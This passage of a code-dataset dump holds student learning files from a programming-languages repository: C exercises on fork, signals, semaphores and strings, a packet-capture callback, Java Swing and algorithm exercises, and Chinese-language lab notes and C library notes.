MPI_Allreduce(MPI_IN_PLACE, &rowsum, 1, MPI_INT, MPI_SUM, row_comm);\n MPI_Allreduce(MPI_IN_PLACE, &columnsum, 1, MPI_INT, MPI_SUM, column_comm);\n\n printf(\n \"I'm process %d, my coordinates are (%d, %d), row sum is %d, column sum \"\n \"is %d\\n\",\n myid, myrow, mycolumn, rowsum, columnsum);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7560137510299683, "alphanum_fraction": 0.7651775479316711, "avg_line_length": 57.266666412353516, "blob_id": "814d9160f6c705f90702a11aec6f83f2d3c115f9", "content_id": "f1b827a95c9550144d982cab264748b01d1cb57e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 873, "license_type": "permissive", "max_line_length": 552, "num_lines": 15, "path": "/java/hardwork/ant/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Apache Ant\n`jskyzero` `2017/12/31`\n\n## Overview\nApache Ant is a Java library and command-line tool whose mission is to drive processes described in build files as targets and extension points dependent upon each other. The main known usage of Ant is the build of Java applications. Ant supplies a number of built-in tasks allowing to compile, assemble, test and run Java applications. Ant can also be used effectively to build non Java applications, for instance C or C++ applications. More generally, Ant can be used to pilot any type of process which can be described in terms of targets and tasks.\n\n## Install && Run\n\n+ install : `sudo apt-get install ant`\n+ run : `ant run`(if you have written build.xml)\n\n## Reference\n\n+ [ant.apache.org](http://ant.apache.org/)\n+ [Tutorial: Hello World with Apache Ant](https://ant.apache.org/manual/tutorial-HelloWorldWithAnt.html)" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5660377144813538, "avg_line_length": 12.25, "blob_id": "91c513f9aea35c7c6457ddd219d456dd91393c57", "content_id": "dbd56e7d00254dbd2e6facb8c10dc3cec08d59f8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 106, "license_type": "permissive", "max_line_length": 22, "num_lines": 8, "path": "/c/hardwork/hardway/ifdef.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define Cprog\nint main() {\n int a = 2;\n#ifdef Cprog\n a = 1;\n printf(\"%d\", Cprog);\n}\n" }, { "alpha_fraction": 0.47346073389053345, "alphanum_fraction": 0.48619958758354187, "avg_line_length": 15.821428298950195, "blob_id": "a6aec7caa875e8826b83e10de69d519ccbe04175", "content_id": "3d2f141449bff2e460aa595187477e677d1cf7ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 489, "license_type": "permissive", "max_line_length": 43, "num_lines": 28, "path": "/c/hardwork/library/string/reverse_string.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf(), puts() \n#include <string.h> // for strlen()\n\n// 操作字符串函数实践\nchar* reverseString(char* s) {\n int n = strlen(s); // string length\n int i = 0; // for loop\n\n char p[n]; // store reversed string\n\n for (i = n - 1; i >= 0; i--) {\n p[n - 1 - i] = s[i];\n }\n puts(p);\n \n for (i = n - 1; i >= 0; i--) {\n s[i] = p[i];\n }\n\n puts(s);\n return s;\n}\n\nint main() {\n char s[] = \"hello\";\n char* p = reverseString(s);\n printf(\"%s\", p);\n}\n" }, { "alpha_fraction": 0.7130584120750427, "alphanum_fraction": 0.7156357169151306, "avg_line_length": 49.60869598388672, "blob_id": "9c484e846ce3e060a20b7304c22841a206ec1f62", "content_id": "a1c6f6bf0ca63f3da74aed9ca0ff609225288ce5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1164, "license_type": "permissive", "max_line_length": 80, "num_lines": 23, "path": "/c/projects/sniff/capture.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <capture.h>\n\n/* this is the callback function used by pcap. which means, whenever pcap\n * receives a packet it calls this function. let me explain the parameters of\n * pcap_callback now 0) first one is a parameter we just wanted to pass to our\n * function (basically any variable(s) we want to use in here from main()) 1)\n * second one is the header of the packet we captured, this includes ethernet\n * header, followed by ip header etc. 2) third one is the full packet, i.e. raw\n * packet right out of the wire with its payload\n *\n * so, what i'm doing here is simply adding the packet and packet header to a\n * linked-list, but you can do anything you want this packet. see what i'm doing\n * with the packets i store in the linked-list in the main, you can almost\n * copy-paste that stuff here and it would work just fine.\n */\nvoid pcap_callback(u_char *arg, const struct pcap_pkthdr *pkthdr,\n const u_char *packet) {\n /* just append the packet header and raw packet to the linked-list\n * nothing fancy here, look at main() to learn how to work with the\n * packet header etc.\n */\n append_item((buffer *)arg, pkthdr, packet);\n}\n" }, { "alpha_fraction": 0.5608108043670654, "alphanum_fraction": 0.5698198080062866, "avg_line_length": 14.518518447875977, "blob_id": "3becbe4cd254a3a744312f0e337337ec9e5139f7", "content_id": "216854e4125164998d4bf838a954c249e36f6faf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 488, "license_type": "permissive", "max_line_length": 72, "num_lines": 27, "path": "/c/hardwork/library/time/clock.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <time.h>\r\n\r\n/*\r\n 既然决定了还是好好看下去吧w\r\n 半途而废又算什么呢?\r\n*/\r\ntypedef void(*void_func)(void);\r\n\r\nvoid check_time(void_func func){\r\n clock_t begin_time = clock();\r\n func();\r\n clock_t end_time = clock();\r\n printf(\"use time %f\", (float)(end_time - begin_time)/CLOCKS_PER_SEC); \r\n}\r\n\r\nvoid select_problem() {\r\n int k = 1<<30;\r\n while(k--) {\r\n k = k;\r\n }\r\n}\r\n\r\nint main() {\r\n check_time(select_problem);\r\n return 0; \r\n}" }, { "alpha_fraction": 0.34705883264541626, "alphanum_fraction": 0.4117647111415863, "avg_line_length": 20.25, "blob_id": "9c62376928bb913a3ff20e108c12898edf4f3944", "content_id": "8cd4fa8a648bd8fbf0582b6887bca5173871fb06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 340, "license_type": "permissive", "max_line_length": 48, "num_lines": 16, "path": "/c/hardwork/hardway/char_and_char_pointer.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n char* p1[4][4] = {\"abc\", \"def\", \"efg\", \"hij\"};\n printf(\"%s\\n\", p1[0]);\n printf(\"%c\\n\", *(p1[1] + 1));\n\n char*(p2[4]) = {\"abc\", \"def\", \"efg\", \"hij\"};\n printf(\"%s\\n\", p2[0]);\n printf(\"%c\\n\", *(p2[1] + 1));\n\n int a[4] = {1, 2, 3, 4};\n char(*p3)[4] = a;\n printf(\"%d\\n\", *a++);\n printf(\"%d\\n\", *a);\n}\n" }, { "alpha_fraction": 0.4653061330318451, "alphanum_fraction": 0.4938775599002838, "avg_line_length": 17.923076629638672, "blob_id": "e97c094487d021416960516b591d6dd3bb7a79b3", "content_id": "2cd4175a8990e891cc2497dc5ab7366c3cb8bba0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 245, "license_type": "permissive", "max_line_length": 42, "num_lines": 13, "path": "/java/projects/algorithms/chapter1/part1/Q8.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q8\n */\npublic class Q8 {\n public static void main(String[] args) {\n TestCodes.test(() -> {\n System.out.print('b');\n System.out.print('b' + 'c');\n System.out.print((char)('a' + 4));\n return 0;\n }, \"b197e\");\n }\n}" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.7251655459403992, "avg_line_length": 42.28571319580078, "blob_id": "86eb482e6dac206cccaa81bab1542df435baf6d8", "content_id": "d8f7f501a2485b4bc01be0075b89d937cab399ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 302, "license_type": "permissive", "max_line_length": 81, "num_lines": 7, "path": "/c/projects/POSIX/Lab2/2.2.test.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "python2.7 2.2.produce_data.py\ngcc 2.2.matrix.c -o matrix -pthread\n./matrix > 2.2.ans\n# if #define READ_TEST 1 and comment ANS_TEST then uncomment data and comment ans\n# diff --strip-trailing-cr 2.2.ans 2.2.data.csv\ndiff --strip-trailing-cr 2.2.ans 2.2.ans.csv\nrm matrix 2.2.ans 2.2.data.csv 2.2.ans.csv" }, { "alpha_fraction": 0.4659949541091919, "alphanum_fraction": 0.508816123008728, "avg_line_length": 14.920000076293945, "blob_id": "b9711e4922f3a536d75a00b23dfdea84d4e8edec", "content_id": "9ef3e32a333579166b12cf3949c28cceda96723b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 397, "license_type": "permissive", "max_line_length": 44, "num_lines": 25, "path": "/java/hardwork/swing/Simple.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import javax.swing.*; // for swing \n\npublic class Simple\n{\n private JFrame f;\n\n Simple ()\n {\n f = new JFrame();\n\n JButton b = new JButton(\"click\");\n b.setBounds(130, 100, 100, 40);\n\n f.add(b);\n\n f.setSize(400, 500);\n f.setLayout(null);\n f.setVisible(true);\n }\n\n\n public static void main(String[] args) {\n new Simple();\n }\n}" }, { "alpha_fraction": 0.6081657409667969, "alphanum_fraction": 0.6179159283638, "avg_line_length": 22.1126766204834, "blob_id": "1fe12e996f5fc4b14e89087b4f87888adc1cbf6b", "content_id": "9b66316b5201a2b1a37487e58cf0751847f1fb40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1641, "license_type": "permissive", "max_line_length": 65, "num_lines": 71, "path": "/c/projects/POSIX/Lab3/3.0.semaphore.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R) in SYSU\n * learn to use semaphore\n */\n\n#include <pthread.h>\n#include <semaphore.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define BUFF_SIZE 3\n\nint nitems;\ntypedef struct sto {\n int buffer[BUFF_SIZE];\n sem_t mutex, nempty, nstored;\n} sto_type;\nsto_type shared;\n\nvoid *produce(void *);\nvoid *consume(void *);\n\nint main(int argc, char **argv) {\n if (argc != 2) {\n printf(\"Usage: prodcons number\\n\");\n exit(0);\n }\n pthread_t tid_produce, tid_consumer;\n nitems = atoi(argv[1]);\n sem_init(&shared.mutex, 0, 1);\n sem_init(&shared.nempty, 0, BUFF_SIZE);\n sem_init(&shared.nstored, 0, 0);\n pthread_create(&tid_produce, NULL, produce, NULL);\n pthread_create(&tid_consumer, NULL, consume, NULL);\n pthread_join(tid_produce, NULL);\n pthread_join(tid_consumer, NULL);\n sem_destroy(&shared.mutex);\n sem_destroy(&shared.nempty);\n sem_destroy(&shared.nstored);\n exit(0);\n}\n\nvoid *produce(void *arg) {\n int i;\n for (i = 0; i < nitems; i++) {\n sem_wait(&shared.nempty);\n sem_wait(&shared.mutex);\n shared.buffer[i % BUFF_SIZE] = i;\n printf(\"%s %d\\n\", \"Product\", shared.buffer[i % BUFF_SIZE]);\n sem_post(&shared.mutex);\n sem_post(&shared.nstored);\n }\n return (NULL);\n}\n\nvoid *consume(void *arg) {\n int i;\n for (i = 0; i < nitems; i++) {\n sem_wait(&shared.nstored);\n sem_wait(&shared.mutex);\n if (shared.buffer[i % BUFF_SIZE] != i) {\n printf(\"buffer[%d] %d\\n\", i, shared.buffer[i % BUFF_SIZE]);\n } else {\n printf(\"Consumer: %d\\n\", shared.buffer[i % BUFF_SIZE]);\n }\n sem_post(&shared.mutex);\n sem_post(&shared.nempty);\n }\n return (NULL);\n}\n" }, { "alpha_fraction": 0.44337812066078186, "alphanum_fraction": 0.5105566382408142, "avg_line_length": 23.85714340209961, "blob_id": "00cf3ed97dc946faf338a7a2b5292ceea69cd5f7", "content_id": "c0905ea6952e2adf7698e25a6ef29ffbab8350dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 521, "license_type": "permissive", "max_line_length": 60, "num_lines": 21, "path": "/java/projects/algorithms/chapter1/part1/Q33.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q33\n */\npublic class Q33 {\n public static void main(String[] args) {\n double[][] A = {{1, 2}, {3, 4}, {5, 6}};\n double[][] B = {{7,8}, {9, 10}};\n\n double[] a = {1, 2, 3};\n double[] b = {4, 5};\n\n System.out.printf(\"a * b = %5f\\n\", Q33Matrix.dot(a, b));\n System.out.printf(\"A * B = \\n\");\n Q33Matrix.print(Q33Matrix.mult(A, B));\n System.out.printf(\"A * a = \\n\");\n Q33Matrix.print(Q33Matrix.mult(A, a));\n System.out.printf(\"a * A = \\n\");\n Q33Matrix.print(Q33Matrix.mult(a, A));\n\n }\n}" }, { "alpha_fraction": 0.60317462682724, "alphanum_fraction": 0.60317462682724, "avg_line_length": 30.5, "blob_id": "dbdf4234b99064d96b979f0d43afad82a42390f5", "content_id": "b6781fae383e0da4470cfcf1186b881c8d029f9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 63, "license_type": "permissive", "max_line_length": 43, "num_lines": 2, "path": "/c/hardwork/hardway/void_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() { printf(\"%ld\", sizeof(void)); }\n" }, { "alpha_fraction": 0.5990888476371765, "alphanum_fraction": 0.6203492879867554, "avg_line_length": 28.266666412353516, "blob_id": "4a2a81056323e67f14db1526c8a442c74e9b1aab", "content_id": "cc673ec686227b82707313400069eb9bc9e91617", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1317, "license_type": "permissive", "max_line_length": 64, "num_lines": 45, "path": "/java/hardwork/swing/Try1.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import javax.swing.*; // for swing\nimport java.awt.event.*;\n\npublic class Try1 implements WindowListener, ActionListener\n{\n private JFrame PageFrame;\n JTextField Text;\n private int ClickTimes;\n Try1 ()\n {\n PageFrame = new JFrame();\n \n JButton ClickButton = new JButton(\"Click\");\n ClickButton.setBounds(0, 0, 100, 100);\n ClickButton.addActionListener(this);\n\n Text = new JTextField();\n Text.setBounds(100,0,400,100);\n\n PageFrame.add(ClickButton);\n PageFrame.add(Text);\n PageFrame.setSize(500, 200);\n PageFrame.setLayout(null);\n PageFrame.setVisible(true);\n }\n public void actionPerformed(ActionEvent e) {\n ClickTimes++;\n Text.setText(\"Button Clicked \" + ClickTimes + \" times\");\n }\n\n\n public void windowClosing(WindowEvent e) {\n PageFrame.dispose();\n System.exit(0);\n }\n public void windowOpened(WindowEvent e) {}\n public void windowActivated(WindowEvent e) {}\n public void windowIconified(WindowEvent e) {}\n public void windowDeiconified(WindowEvent e) {}\n public void windowDeactivated(WindowEvent e) {}\n public void windowClosed(WindowEvent e) {}\n public static void main(String[] args) {\n new Try1();\n }\n}\n" }, { "alpha_fraction": 0.47337278723716736, "alphanum_fraction": 0.5514792799949646, "avg_line_length": 12.412698745727539, "blob_id": "3f5adf3ae97c537186a9d84ed3be13820c1c1b03", "content_id": "7e3b9feed2d0c51ca24c5813826cdf6e44b9b7e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 845, "license_type": "permissive", "max_line_length": 34, "num_lines": 63, "path": "/c/hardwork/hardway/money.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nlong f05(float n) {\n\tint N=n/0.5;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=1;\n\treturn ans;\n}\nlong f1(float n) {\n\tint N=n/1;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f05(n-1*i);\n\treturn ans;\n}\nlong f5(float n) {\n\tint N=n/5;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f1(n-5*i);\n\treturn ans;\n}\nlong f10(float n) {\n\tint N=n/10;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f5(n-10*i);\n\treturn ans;\n}\nlong f20(float n) {\n\tint N=n/20;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f10(n-20*i);\n\treturn ans;\n}\nlong f50(float n) {\n\tint N=n/50;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f20(n-50*i);\n\treturn ans;\n}\nlong f100(float n) {\n\tint N=n/100;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f50(n-100*i);\n\treturn ans;\n}\n\n\n\n\nint main() {\n\tfloat n;\n\twhile(scanf(\"%f\",&n)!=EOF){\n\t\t\tprintf(\"%ld\\n\",f100(n));\n\t}\n\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.30612245202064514, "alphanum_fraction": 0.3877550959587097, "avg_line_length": 15.333333015441895, "blob_id": "73e520c24f9236b2294310ec1b916323eb4b9f06", "content_id": "0011a42f309bf8f81798cb73c723d6c506661b82", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 147, "license_type": "permissive", "max_line_length": 33, "num_lines": 9, "path": "/c/hardwork/hardway/two_dimension_array.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint a[3][2] = {1, 2, 3, 4, 5, 6};\n\nint main() {\n int* p = a[0];\n for (p; p < a[0] + 6; p++) {\n printf(\"%d\\n\", p[0]);\n }\n}\n" }, { "alpha_fraction": 0.371048241853714, "alphanum_fraction": 0.40599000453948975, "avg_line_length": 17.78125, "blob_id": "d294054434da044cf99519d64cafa83c8c3310a6", "content_id": "9f9a311ee10f37863fe58caf8dd2e3620ace2c6c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 601, "license_type": "permissive", "max_line_length": 62, "num_lines": 32, "path": "/c/hardwork/hardway/read_and_print.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() prinf()\n\nint a[1005];\nint main() {\n int N, n, i, j;\n // OK now I know memset and global vlaue is initial valued 0\n for (j = 1; j; j++) {\n for (i = 0; i <= 1000; i++) {\n a[i] = 0;\n }\n\n // Now I will use while loop\n scanf(\"%d\", &N);\n if (0 == N)\n break;\n else\n for (i = 0; i < N; i++) {\n scanf(\"%d\", &n);\n a[n]++;\n }\n\n // print ans part\n printf(\"Case %d:\\n\", j);\n for (i = 0; i <= 1000; i++) {\n if (0 == a[i])\n continue;\n else\n printf(\"%d %d\\n\", i, a[i]);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.48695650696754456, "avg_line_length": 13.375, "blob_id": "07ba1c2e26eae315ec938b69f367279770661b12", "content_id": "c99f564833dbee556e511ec55d85cc670adae7f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 115, "license_type": "permissive", "max_line_length": 23, "num_lines": 8, "path": "/c/hardwork/hardway/register.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nvoid m();\nint main() {\n register int x = 5;\n m();\n printf(\"x is %d\", x);\n}\nvoid m() { x++; }\n" }, { "alpha_fraction": 0.5672884583473206, "alphanum_fraction": 0.6172551512718201, "avg_line_length": 18.37419319152832, "blob_id": "f505fa570b42046f7405be74bb92b0556e25f25d", "content_id": "6bdafe062ae504863125b26a2968386f50dc7de4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4710, "license_type": "permissive", "max_line_length": 128, "num_lines": 155, "path": "/c/projects/POSIX/Lab1/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 实验1 进程和进程通信\n> DDL: 2017/04/10 24:00\n\n## 进程的创建实验\n1. 编译运行如下程序并解释现象\n```C\n#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n printf(\"**1**\\n\");\n\n int pid_2 = fork();\n printf(\"**2**\\n\");\n\n if (pid_1 == 0) {\n int pid_3 = fork();\n printf(\"**3**\\n\");\n } else {\n printf(\"**4**\\n\");\n }\n return 0;\n}\n```\n现象:能看到2个1,4个2,2个4,4个3,如下\n解释:程序一共有3次fork(),正常将产生6个子进程,第一次fork(),两个进程都将会输出1,第二次fork(),四个进程都将会输出2,第三次fork()仅对第一次的子进程(经过第二次fork()有两个),产生四个进程,输出四个3,余下两个将会输出4。\n```\n**1**\n**1**\n**2**\n**4**\n**2**\n**4**\n**2**\nbash-3.2$ **2**\n**3**\n**3**\n**3**\n**3**\n```\n\n2. 编写一段程序,使用系统调用fork()创建两个子进程。当此程序运行时,在系统中有一个父进程和两个子进程活动。让每一个进程在屏幕上显示一个字符;父进程显示字符“a”;子进程分别显示字符“b”和字符“c”。试观察记录屏幕上的显示结果,并分析原因。\n\n```C\n#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n if (pid_1 != 0) {\n int pid_2 = fork();\n if (pid_2 != 0) {\n puts(\"a\");\n } else {\n puts(\"c\"); // second sub process print \"c\"\n }\n } else {\n puts(\"b\"); // first sub process print \"b\"\n }\n}\n```\n输出如下:\n原因:第一次fork(),通过返回值判断,父进程将继续fork(),子进程就会输出`b\\n`,同理通过又一次fork(),父进程和第二个子进程分别输出`a\\n`和`c\\n`。\n```\nb\na\nc\n```\n\n3. 下面程序将在屏幕上输出的字符‘X’、数字“1” 和“0”各多少个?为什么?\n```C\n#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid;\n if ((pid = fork())) a = 1;\n for (i = 0; i < 2; i++) {\n printf(\"X\");\n }\n if (pid == 0) printf(\"%d\\n\", a);\n return 0;\n}\n// XXXX0\n```\n输出:`XXXX0`\n解释:一次fork(),两个进程,两个都会循环输出两个X,共计四个X,父进程a被置1,但是仅当检测到为子进程的时候才会输出,于是只有一次a的初始值0.\n\n4. 如果将上面main函数修改如下,则屏幕上输出的字符‘X’、数字“1”和“0”各多少个?为什么?\n```C\n#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid[2];\n for (i = 0; i < 2; i++) {\n if ((pid[i] = fork())) a = 1;\n // fork();\n printf(\"X\");\n }\n if (pid[0] == 0) printf(\"%d\\n\", a);\n if (pid[1] == 0) printf(\"%d\\n\", a);\n return 0;\n} \n```\n输出:\n```\nXXXX1\nXX1\nbash-3.2$ XX0\n0\n```\n原因:最开始分析的时候我认为是六个,如果我们修改输出`X`为`X\\n`看到的就是只有6个,8个是因为复制的时候连输出缓存一起复制了,下面解释6个原因。\n循环内部第一次fork(),输出两个X,父进程的a置1,对于这两个进程有(pid[0],pid[1], a)={(+, ?, 1), (0, ? , 0)}\n第二次fork(),变为四个进程,输出四个X,原来的两个进程的a置1,共计六个X,\n对于现在这四个进程有(pid[0],pid[1], a)={{(+, +, 1), (+, 0, 1)}, {(0, 1 , 1), (0, 0, 0)}}\n对于输出a,我们可以发现只要一个pid为0就会输出一次,共计四次,两个1两个0.\n\n## 信号处理实验\n(a) 参考2.1.c\n(b) 参考2.2.c\n执行结果:\n`Ctrl-\\`和`Ctrl-C`键入不再有效\n分析原因:\n加了忽略这俩信号的语句。\n\n注1:最开始我没有看到给的例子程序,整个程序都是自己手动写的,所以语句加入的位置和老师希望考察的不一样。\n注2:据wikipedia,Ctrl-C发送INT信号(SIGINT),Ctrl-\\发送QUIT信号(SIGQUIT),这与实验指导上的描述不符。\n\n## 进程间共享内存实验\n> 完成课本第三章的练习3.10的程序\n\n参考3.1.c\n\n## 实现shell的要求\n> 完成课本上第三章的项目:实现shell。除此之外满足下面要求:在shell下,按ctrl+C时不会终止shell;\n\n参考4.1.c\n\n注1:编写环境为macOS,以下为gcc -v输出,由于在bash on windows上连编译都会报错(关于头文件和写法警告)所以思考了一下还是把环境贴出来。\n```shell\n~/workspace/Study/C-Study$ gcc -v\nConfigured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-inc\nlude-dir=/usr/include/c++/4.2.1\nApple LLVM version 8.0.0 (clang-800.0.42.1)\nTarget: x86_64-apple-darwin16.3.0\nThread model: posix\nInstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctool\nchain/usr/bin\n```" }, { "alpha_fraction": 0.39316239953041077, "alphanum_fraction": 0.39316239953041077, "avg_line_length": 18, "blob_id": "0f4cfb0afce50feca817ecd8637a6853ca3874b6", "content_id": "1d577969942ed9ddf7b3cd37e7ffbaae39e602fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 117, "license_type": "permissive", "max_line_length": 35, "num_lines": 6, "path": "/c/hardwork/hardway/define_#.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": " #include <stdio.h>\n\t #define foo(m, n) #x #y\n\t int main()\n\t {\n\t printf(\"%s\\n\", foo(k, l));\n\t }\n\n" }, { "alpha_fraction": 0.5959193110466003, "alphanum_fraction": 0.6027204394340515, "avg_line_length": 18.116592407226562, "blob_id": "19912ae7861e72eae3422c4c167f3d263d2ee30d", "content_id": "51006687aab3ffd99c6cfc30edf570a6fb35c69e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4315, "license_type": "permissive", "max_line_length": 222, "num_lines": 223, "path": "/c/docs/C-Library.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "C标准函数库简介\n\n# C library\n\n[TOC]\n\n## C90\n\n\n\n## assert.h C Diagnostics Library \n\n```C\nvoid assert (int expression);\n```\n\n## ctype.h Character handling functions \n\n```c\nint isdigit ( int c );\nint islower ( int c );\nint toupper ( int c );\n```\n\n## errno.h C Errors \n\n[**errno**](http://www.cplusplus.com/reference/cerrno/errno/) Last error number (macro )\n\n## float.h Characteristics of floating-point types \n\nFLT_MAX DBL_MAX LDBL_MAX \n\nFLT_EPSILON DBL_EPSILON LDBL_EPSILON\n\n## iso646.h\n\n| macro | operator |\n| ------ | -------- |\n| and | && |\n| and_eq | &= |\n| bitand | & |\n| bitor | \\| |\n| compl | ~ |\n| not | ! |\n| not_eq | != |\n| or | \\|\\| |\n| or_eq | \\|= |\n| xor | ^ |\n| xor_eq | ^= |\n\n| FLT_MAX  DBL_MAX  LDBL_MAX | `1E+37` or greater `1E+37` or greater `1E+37` or greater | MAXimum | Maximum finite representable floating-point number. |\n| -------------------------------------- | ---------------------------------------- | ------- | ---------------------------------------- |\n| FLT_EPSILON  DBL_EPSILON  LDBL_EPSILON | `1E-5` or smaller `1E-9` or smaller `1E-9` or smaller | | Difference between 1 and the least value greater than 1 that is representable. |\n\n## limits.h\n\nCHAR_BIT INT_MAX LLONG_MIN\n\n## locale.h\n\n[**struct lconv**](http://www.cplusplus.com/reference/clocale/lconv/) [**setlocale**](http://www.cplusplus.com/reference/clocale/setlocale/) [**localeconv**](http://www.cplusplus.com/reference/clocale/localeconv/) \n\n## math.h\n\ncos, acos , cosh\n\nlog, log10\n\npow sqrt\n\nceil floor\n\nabs\n\n## setjmp.h\n\n```c\n/* longjmp example */\n#include <stdio.h> /* printf */\n#include <setjmp.h> /* jmp_buf, setjmp, longjmp */\n\n\n\nmain()\n{\n jmp_buf env;\n int val;\n\n val=setjmp(env);\n\n printf (\"val is %d\\n\",val);\n\n if (!val) longjmp(env, 1);\n\n return 0;\n}\n```\n\n## signal.h\n\n`Some running environments use *signals* to inform running processes of certain events.`\n\n```c\n/* signal example */\n#include <stdio.h> /* printf */\n#include <signal.h> /* signal, raise, sig_atomic_t */\n\n\n\nsig_atomic_t signaled = 0;\n\nvoid my_handler (int param)\n{\n signaled = 1;\n}\n\nint main ()\n{\n void (*prev_handler)(int);\n\n prev_handler = signal (SIGINT, my_handler);\n\n /* ... */\n raise(SIGINT);\n /* ... */\n \n printf (\"signaled is %d.\\n\",signaled);\n \n\n return 0;\n}\n```\n\n## stdarg.h\n\n- [**va_start**](http://www.cplusplus.com/reference/cstdarg/va_start/)\n\n Initialize a variable argument list (macro )\n\n\n- [**va_arg**](http://www.cplusplus.com/reference/cstdarg/va_arg/)\n\n Retrieve next argument (macro )\n\n\n- [**va_end**](http://www.cplusplus.com/reference/cstdarg/va_end/)\n\n End using variable argument list (macro )\n\n\n- [**va_copy **](http://www.cplusplus.com/reference/cstdarg/va_copy/)\n\n Copy variable argument list (macro )\n\n## stddef.h\n\n- [**ptrdiff_t**](http://www.cplusplus.com/reference/cstddef/ptrdiff_t/)\n\n Result of pointer subtraction (type )\n\n\n- [**size_t**](http://www.cplusplus.com/reference/cstddef/size_t/)\n\n Unsigned integral type (type )\n\n## stdio.h\n\n## stdlib.h\n\n## string.h\n\n## time.h\n\n#### Time manipulation\n\n- [**clock**](http://www.cplusplus.com/reference/ctime/clock/)\n\n Clock program (function )\n\n\n- [**difftime**](http://www.cplusplus.com/reference/ctime/difftime/)\n\n Return difference between two times (function )\n\n\n- [**mktime**](http://www.cplusplus.com/reference/ctime/mktime/)\n\n Convert tm structure to time_t (function )\n\n\n- [**time**](http://www.cplusplus.com/reference/ctime/time/)\n\n Get current time (function )\n\n#### Conversion\n\n- [**asctime**](http://www.cplusplus.com/reference/ctime/asctime/)\n\n Convert tm structure to string (function )\n\n\n- [**ctime**](http://www.cplusplus.com/reference/ctime/ctime/)\n\n Convert time_t value to string (function )\n\n\n- 